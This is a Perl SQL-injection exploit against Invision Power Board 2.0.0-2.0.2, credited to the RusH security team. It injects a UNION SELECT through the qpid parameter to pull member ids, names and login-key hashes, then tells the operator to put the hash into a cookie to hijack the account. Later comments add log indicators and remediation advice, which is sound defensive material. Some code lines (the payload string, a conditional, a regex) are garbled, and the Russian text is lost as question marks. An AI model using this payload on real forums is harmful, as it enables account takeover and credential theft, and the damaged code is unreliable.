
#!/usr/bin/perl
use IO::Socket;

## Invision Power Board v2.0.0 - 2.0.2 sql injection exploit
## by RusH security team (www.rst.void.ru)
## coded by 1dt.w0lf
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## example:
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3
## ------------------------------------------------------------------------------------------------
## [>] SERVER: 127.0.0.1
## [>] DIR: /IPB202/
## [>] FORUM: 2
## [>] TOPIC: 1
## [>] SID: 3edb1eaeea640d297ee3b1f78b5679b3
## [>] PREFIX:
## [>] ID:
## ------------------------------------------------------------------------------------------------
##
## [~] PREPARE TO CONNECT...
## [+] CONNECTED
## [~] SENDING QUERY...
## [+] DONE!
##
## PREFIX: ibf_
##
## r57ipb.pl 127.0.0.1 /IPB202/ 2 1 3edb1eaeea640d297ee3b1f78b5679b3 ibf_
## ------------------------------------------------------------------------------------------------
## [>] SERVER: 127.0.0.1
## [>] DIR: /IPB202/
## [>] FORUM: 2
## [>] TOPIC: 1
## [>] SID: 3edb1eaeea640d297ee3b1f78b5679b3
## [>] PREFIX: ibf_
## [>] ID:
## ------------------------------------------------------------------------------------------------
##
## [~] PREPARE TO CONNECT...
## [+] CONNECTED
## [~] SENDING QUERY...
## [+] DONE!
##
## --[ REPORT ]------------------------------------------------------------------------------------
## MEMBER_ID: [1] NAME: [admin] PASS_HASH: [73dea61281aa9b08ed31b4ae2bb9954e]
## ------------------------------------------------------------------------------------------------
## Now you need edit cookie and insert new pass_hash and member_id values.
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## ???? ???? ? ???????????? ?????????? ??????????:
## ???????? pass_hash ??? ?? ????????????? ?????? ?????!!! ? ??????????? ????????
## ?? ?????? ? ??????? ???????? ????? ????? ?? ????? ??? ????? ?????? ???
## ????? ??????. member_id ??? ????? ??????????? ???????? ?? ??????. ??????? ??
## ????? ???????? ???????????? pass_hash =) ?????? ????????????????? ?? ?????? ?
## ???????? pass_hash ? member_id ? ????? cookie ?? ???? ?? ????????
## ??????? ?????? ??????.
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~


# Usage guard: with fewer than five command-line arguments the script prints
# its help text and exits before any network activity.
# NOTE(review): the \" and \\r\\n sequences throughout this listing appear to
# be escaping left behind by the page extraction rather than the original
# Perl; the listing is kept exactly as the page shows it.
if (@ARGV < 5)
{
print \"-------------------------------------------------------------------------\\r\\n\";
print \" Invision Power Board v2.0.0 - 2.0.2 sql injection exploit\\r\\n\";
print \"-------------------------------------------------------------------------\\r\\n\";
print \"usage:\\r\\n\";
print \"r57ipb.pl SERVER /DIR/ FORUM_NUM TOPIC_NUM SID [TABLE_PREFIX] [USER_ID]\\r\\n\\r\\n\";
print \"SERVER - server where IPB installed\\r\\n\";
print \"/DIR/ - IPB directory or / for no directory\\r\\n\";
print \"FORUM_NUM - number of existing forum\\r\\n\";
print \"TOPIC_NUM - number of existing topic\\r\\n\";
print \"SID - your session id\\r\\n\";
print \"[TABLE_PREFIX] - table prefix in database\\r\\n\";
print \"[USER_ID] - user id for exploiting\\r\\n\\r\\n\";
print \"e.g. r57ipb.pl 127.0.0.1 /IPB/ 2 1 4496b6d35c1bc0662d721c207f81784e ibf_\\r\\n\";
print \"-------------------------------------------------------------------------\\r\\n\";
exit();
}

# A call without the optional sixth argument (TABLE_PREFIX) sets $get_table,
# which selects the prefix-discovery branch used later in the script.
if (@ARGV < 6) { $get_table = 1; }

# Positional arguments are copied unchanged into undeclared package globals:
# the file has no `use strict` / `use warnings`, and none of the values is
# validated before being placed into the request.
$server = $ARGV[0];
$dir = $ARGV[1];
$fnum = $ARGV[2];
$tnum = $ARGV[3];
$sid = $ARGV[4];
$prefix = $ARGV[5];
$id = $ARGV[6];

# Echo the parsed arguments back to the operator; $prefix and $id are empty
# when the optional arguments were not supplied.
print \"-----------------------------------------------------------------------------------------------\\r\\n\";
print \"[>] SERVER: $server\\r\\n\";
print \"[>] DIR: $dir\\r\\n\";
print \"[>] FORUM: $fnum\\r\\n\";
print \"[>] TOPIC: $tnum\\r\\n\";
print \"[>] SID: $sid\\r\\n\";
print \"[>] PREFIX: $prefix\\r\\n\";
print \"[>] ID: $id\\r\\n\";
print \"-------------------------------------------------------------------------------------------\\r\\n\\r\\n\";

# Remove any "http://" from the host argument so the value can serve as the
# socket peer address and the Host header. The /e modifier adds nothing here
# because the replacement is empty.
$server =~ s/(http:\\/\\/)//eg;

# Assemble the request URI: the board's index.php with the caller's session id
# (s=), act=Post, CODE=02, and the forum (f=) and topic (t=) numbers.
$path = $dir;
$path .= \"index.php?s=\";
$path .= $sid;
$path .= \"&act=Post&CODE=02&f=\";
$path .= $fnum;
$path .= \"&t=\";
$path .= $tnum;
# Defender note: everything below travels in the qpid query parameter, and
# both branches fill it with a value that is not a plain number. Access-log
# entries for act=Post&CODE=02 whose qpid holds anything other than digits are
# the indicator to hunt for. The header of this file names IPB 2.0.0 - 2.0.2
# as affected; the fixed release is not stated on this page. Coercing qpid to
# an integer before it reaches the query is the application-side remedy --
# presumably what the vendor fix does; confirm against the vendor advisory.
if ($get_table == 1)
{
# Discovery mode: a non-numeric qpid. The response parser further down looks
# for the board's "mySQL query error" text, so this mode depends on the board
# echoing raw SQL errors to the visitor.
$path .= \"&qpid=r57\"
}
else
{
# Extraction mode: qpid carries a UNION SELECT against the <prefix>members
# table that names the id, name and member_login_key columns.
# NOTE(review): the string on the next three lines and the conditional that
# follows $path .= \"members\" are garbled in the page (text lost in
# extraction); they are kept as found.
$path .= \"&qpid=666666666)%20union%20select%201,1,1,1,1,1,1,1,1,1,CONCAT(id,char(5,
name,char(5,
member_login_key),1,1,1,1,1,1,1,1,1%20from%20\";
$path .= $prefix;
$path .= \"members\";
$path .= ($id)?(\"%20WHERE%20id=$id%20\")\"%20\");
$path .= \"/*\";
}
# Open a plain TCP connection to port 80 of the host argument (IO::Socket::INET,
# no TLS) and abort with a message if the connection cannot be made.
print \"[~] PREPARE TO CONNECT...\\r\\n\";

$socket = IO::Socket::INET->new( Proto => \"tcp\", PeerAddr => \"$server\",
PeerPort => \"80\") || die \"[-]
CONNECTION FAILED\";

# Send one hand-written HTTP/1.1 GET for the assembled path.
# Defender note: the request consists of only Host, Accept and Connection
# headers -- no User-Agent, Referer or Cookie -- and the session id travels in
# the s= query parameter. That header shape on a posting URL is unusual for a
# browser and is a useful secondary trait when triaging web-server logs.
print \"[+] CONNECTED\\r\\n\";
print \"[~] SENDING QUERY...\\r\\n\";
print $socket \"GET $path HTTP/1.1\\r\\n\";
print $socket \"Host: $server\\r\\n\";
print $socket \"Accept: */*\\r\\n\";
print $socket \"Connection: close\\r\\n\\r\\n\";
# "DONE" only means the request was written to the socket; the response has
# not been read at this point.
print \"[+] DONE!\\r\\n\\r\\n\";

# $suc records whether any response line matched the pattern being searched for.
$suc =0;

# Prefix-discovery mode: read the response line by line and look for the
# board's SQL error text. The fourth capture group -- whatever sits between
# " FROM " and "posts" on the matching line -- is printed as the table prefix.
# Defender note: this branch yields nothing unless the application returns the
# failing SQL statement to the visitor, so logging database errors server-side
# instead of displaying them removes this information leak.
if ($get_table == 1)
{
while ($answer = <$socket>)
{
if ($answer =~ /(mySQL query error: )(.*)( FROM )(.*)(posts)/){ print \"PREFIX: $4\\r\\n\";
$suc = 1; }
}
if (!$suc) { print \"Exploit failed\\r\\n\"; }
# The script always stops here in discovery mode, whether or not a line matched.
exit();
}

# Extraction mode: scan the response line by line and print one report entry
# (member id, name, 32-character value) for every line the pattern matches.
# NOTE(review): the pattern in the loop below is garbled in the page
# (unbalanced parentheses, text lost in extraction); it is kept as found.
print \"--[ REPORT ]---------------------------------------------------------------------------------\\r\\n\";
while ($answer = <$socket>)
{
if ($answer =~ /^([^:]*)[^:]*)[a-z,0-9]{32})$/) { print \"MEMBER_ID: [$1] NAME: [$2]
PASS_HASH: [$3]\\r\\n\"; $suc = 1; }
}
print \"------------------------------------------------------------------------------------------------\\r\\n\";
# Defender note: the closing message tells the operator to place the reported
# pass_hash and member_id into a cookie, i.e. the value read from
# member_login_key is presumably accepted by the board as a login credential.
# For incident response this means upgrading alone is not sufficient on a
# board that was exposed: the stored login keys of affected members should be
# regenerated (for example by forcing password changes) -- confirm the exact
# procedure against the vendor documentation.
if ($suc == 1) { print \"Now you need edit cookie and insert new pass_hash and
member_id values.\\r\\n\";
exit(); }
else { print \"Exploit failed\\r\\n\"; }
